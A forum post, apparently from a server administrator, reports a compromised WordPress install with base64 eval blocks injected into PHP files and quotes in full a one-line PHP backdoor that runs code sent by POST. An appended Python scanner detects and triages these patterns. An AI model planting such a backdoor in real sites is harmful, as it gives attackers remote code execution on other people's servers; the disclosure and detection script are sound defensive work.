Possible security issue in "search and replace" 2.6
Hi,
One of the servers I’m administrating was corrupted. We aren’t exactly sure about what happened yet but here’s what we’ve found:
– There’s a block of code beginning with <?php eval(base64_decode("DQplcnJvcl... at the top of each php file on the server. This code redirects visitors to ads when their referrer is a search engine.
– There’s a single backdoor in the theme of a WordPress installed on the server: <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>. Since this code is only present once on the server, we think the origin of the exploit can be narrowed down to this WordPress install.
– There are several plugins installed on this WordPress, including “search and replace”, but search-and-replace.php is the only file on the server that is riddled with <?php eval(base64_decode("DQplcnJvcl... blocks (not just one at the top), see this pastebin: http://pastebin.com/jmynTEgx
I just wanted to let you know and see if other users had similar troubles.
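
A defender's sweep for the two patterns quoted in the post, as an added example that is not part of the original post: it counts literal `eval(base64_decode("` blocks and request-fed `eval(base64_decode($_POST` calls in each PHP file, then groups files by the three situations described (backdoor, many blocks, one block at the top). The function names and the extra superglobals (`$_GET`, `$_REQUEST`, `$_COOKIE`) are assumptions of this example.

```python
import re
from pathlib import Path

# Both patterns are derived from the two snippets quoted in the post.
# Literal payload: eval(base64_decode("...  (the ad-redirect block)
LITERAL = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*[\"']", re.I)
# Request-fed payload: eval(base64_decode($_POST[...  (the backdoor).
# The superglobals other than $_POST are an assumption added here.
REQUEST = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)

def scan_bytes(data: bytes) -> dict:
    """Count both patterns and note whether the first literal block opens the file."""
    literal = list(LITERAL.finditer(data))
    at_top = bool(literal) and (
        data[:literal[0].start()].strip().lower() in (b"<?php", b"<?"))
    return {"literal": len(literal),
            "request_fed": len(REQUEST.findall(data)),
            "at_top": at_top}

def scan_tree(root) -> dict:
    """Scan every *.php file under root; return findings keyed by relative path."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        result = scan_bytes(path.read_bytes())
        if result["literal"] or result["request_fed"]:
            findings[str(path.relative_to(root))] = result
    return findings

def triage(findings: dict) -> dict:
    """Group files as the post does: backdoor, many blocks, one block at the top."""
    groups = {"backdoor": [], "multiple_blocks": [], "single_top_block": [], "other": []}
    for name, r in findings.items():
        if r["request_fed"]:
            groups["backdoor"].append(name)
        elif r["literal"] > 1:
            groups["multiple_blocks"].append(name)
        elif r["at_top"]:
            groups["single_top_block"].append(name)
        else:
            groups["other"].append(name)
    return groups

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for group, files in triage(scan_tree(root)).items():
        for name in files:
            print(f"{group}\t{name}")
```

Files in `multiple_blocks` and `backdoor` are the ones worth diffing against a clean copy first, since they stand out from the uniform one-block-per-file injection.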